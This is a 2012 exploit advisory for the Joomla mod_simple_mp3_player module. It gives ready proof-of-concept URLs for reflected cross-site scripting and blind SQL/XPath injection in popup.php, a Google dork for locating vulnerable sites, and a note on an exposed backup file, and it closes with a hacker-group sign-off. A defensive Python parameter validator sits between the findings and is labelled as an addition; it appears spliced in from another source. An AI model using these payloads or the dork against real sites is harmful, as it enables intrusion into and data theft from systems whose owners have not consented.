
Joomla module (mod_simple_mp3_player) multiple vulnerabilities

Author: Elite Trojan , Published: 21-09-2012
###############################################################################
# Exploit Title: Joomla module (mod_simple_mp3_player) multiple vulnerabilities
# Date: 24/07/2012
# Author: Elite Trojan
# Category: webapps
# Google dork: inurl:"/modules/mod_simple_mp3_player/"
# Tested on: Windows, BackTrack
###############################################################################

1- Cross Site Scripting (XSS)

Affected File : /modules/mod_simple_mp3_player/popup.php

Vulnerable parameter : smp3p_showinfo

[+] PoC : GET /modules/mod_simple_mp3_player/popup.php?smp3p_useplaylist=1&smp3p_playlistpath=http%3A%2F%2Ffw%2Ewebtoots%2Ecom%2Fmodules%2Fmod_simple_mp3_player%2Fplaylist%2Fplaylist%2Etxt&smp3p_path=111-222-1933email@address.tst&smp3p_files=111-222-1933email@address.tst&smp3p_titles=111-222-1933email@address.tst&smp3p_width=200&smp3p_height=98&smp3p_showinfo=>"><ScRiPt%20%0a%0d>alert(xss)%3B</ScRiPt>&smp3p_showvolume=1&smp3p_volume=75&smp3p_volumewidth=40&smp3p_volumeheight=8&smp3p_autoplay=0&smp3p_loop=0&smp3p_shuffle=0&smp3p_showloading=autohide&smp3p_loadingbarcolor=494845&smp3p_showlist=1&smp3p_showplaylistnumbers=0&smp3p_playlistcolor=66645C&smp3p_playlistalphacolor=30&smp3p_showslider=1&smp3p_sliderwidth=20&smp3p_sliderheight=6&smp3p_slidercolor1=8F8E8B&smp3p_slidercolor2=6C6A63&smp3p_sliderovercolor=AFC400&smp3p_bgimage=-1&smp3p_bgcolor=FFFFFF&smp3p_bgcolor1=444444&smp3p_bgcolor2=000000&smp3p_textcolor=66645C&smp3p_currentmp3color=AFC400&smp3p_buttonwidth=20&smp3p_buttoncolor=8F8E8B&smp3p_buttonovercolor=AFC400&smp3p_scrollbarcolor=585857&smp3p_scrollbarovercolor=AFC400


2- Blind SQL & XPath injection

Affected File : /modules/mod_simple_mp3_player/popup.php

Vulnerable parameter : smp3p_buttonovercolor

[+] PoC : /modules/mod_simple_mp3_player/popup.php?smp3p_useplaylist=1&smp3p_playlistpath=http%3A%2F%2Ffw%2Ewebtoots%2Ecom%2Fmodules%2Fmod_simple_mp3_player%2Fplaylist%2Fplaylist%2Etxt&smp3p_path=111-222-1933email@address.tst&smp3p_files=111-222-1933email@address.tst&smp3p_titles=111-222-1933email@address.tst&smp3p_width=200&smp3p_height=98&smp3p_showinfo=1&smp3p_showvolume=1&smp3p_volume=75&smp3p_volumewidth=40&smp3p_volumeheight=8&smp3p_autoplay=0&smp3p_loop=0&smp3p_shuffle=0&smp3p_showloading=autohide&smp3p_loadingbarcolor=494845&smp3p_showlist=1&smp3p_showplaylistnumbers=0&smp3p_playlistcolor=66645C&smp3p_playlistalphacolor=30&smp3p_showslider=1&smp3p_sliderwidth=20&smp3p_sliderheight=6&smp3p_slidercolor1=8F8E8B&smp3p_slidercolor2=6C6A63&smp3p_sliderovercolor=AFC400&smp3p_bgimage=-1&smp3p_bgcolor=FFFFFF&smp3p_bgcolor1=444444&smp3p_bgcolor2=000000&smp3p_textcolor=66645C&smp3p_currentmp3color=AFC400&smp3p_buttonwidth=20&smp3p_buttoncolor=8F8E8B&smp3p_buttonovercolor=AFC400+and+31337-31337=0&smp3p_scrollbarcolor=585857&smp3p_scrollbarovercolor=AFC400
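Both findings above come from popup.php using query values without checking their shape. As an added defensive example (not part of the advisory or of the module's own code), the following Python validates every smp3p_* parameter of a popup.php request against the value type it should carry and reports the ones that do not fit; the expected shapes (6-digit hex for colour parameters, integers for sizes, 0/1/autohide for show-style flags) are assumptions, and the sample requests are constructed, shortened versions of the two PoCs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Expected value shapes per parameter name, first match wins. Assumption
# (not stated in the advisory): *color = 6-digit hex, *alphacolor and
# sizes = small integer, show*/autoplay/loop/shuffle = 0, 1 or "autohide",
# path/file/title/playlist parameters = free text without HTML metachars.
SHAPES = [
    (re.compile(r"alphacolor$"), re.compile(r"-?\d{1,3}")),
    (re.compile(r"color\d?$"), re.compile(r"[0-9A-Fa-f]{6}")),
    (re.compile(r"(width|height|volume|bgimage)$"), re.compile(r"-?\d{1,4}")),
    (re.compile(r"^smp3p_(show\w+|autoplay|loop|shuffle|useplaylist)$"),
     re.compile(r"0|1|autohide")),
    (re.compile(r"^smp3p_(path|files|titles|playlistpath)$"),
     re.compile(r"[^<>\"']*")),
]

def shape_for(name):
    """Return the value pattern for a parameter name, or None if unknown."""
    for name_re, value_re in SHAPES:
        if name_re.search(name):
            return value_re
    return None

def check_request(url):
    """Return [(param, decoded value)] for every smp3p_* parameter whose
    decoded value does not fully match its expected shape (unknown
    parameters are reported too); an empty list means the request is
    well-formed and safe to pass on to the script."""
    bad = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in query.items():
        if not name.startswith("smp3p_"):
            continue
        shape = shape_for(name)
        for value in values:
            if shape is None or shape.fullmatch(value) is None:
                bad.append((name, value))
    return bad

# Constructed sample requests modelled on the advisory's PoCs (shortened).
BENIGN = ("/modules/mod_simple_mp3_player/popup.php?smp3p_showinfo=1"
          "&smp3p_buttonovercolor=AFC400&smp3p_width=200&smp3p_bgimage=-1"
          "&smp3p_showloading=autohide&smp3p_playlistalphacolor=30")
XSS = ("/modules/mod_simple_mp3_player/popup.php?smp3p_buttonovercolor=AFC400"
       "&smp3p_showinfo=%3E%22%3E%3CScRiPt%3Ealert(xss)%3B%3C/ScRiPt%3E")
SQLI = ("/modules/mod_simple_mp3_player/popup.php?smp3p_showinfo=1"
        "&smp3p_buttonovercolor=AFC400+and+31337-31337=0")

if __name__ == "__main__":
    for label, url in (("benign", BENIGN), ("xss", XSS), ("sqli", SQLI)):
        print(label, check_request(url))
```

The same check can be run over the query part of web-server access-log entries to alert on attempts against an unpatched module.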

3- Backup Files :

Affected Item : /modules/mod_simple_mp3_player/Copy of popup.


+--------------------------------------------------+
[»] #-DzMafia-#
[»] We are : password, eliteTrojan, gel-dz, BackUp
+--------------------------------------------------+
F0llow Us at : www.fb.me/Ma.dz.fia
+---------------------------------------------------+
[»] Greetz to :
[ TrOon,Aghilas,r00t_dz,Hacker-fire,Vaga-hacker,Imed Lakamora, DjamilJocker, YacineJocker, dzN00b ]
[ & -> !Muslims!,Mosta,team152,Inj3ct0r ]
[ And all my Friends + Algerian Hackers ]
-----------------------------------------------------+
DzMafia © 2012 All rights reserved.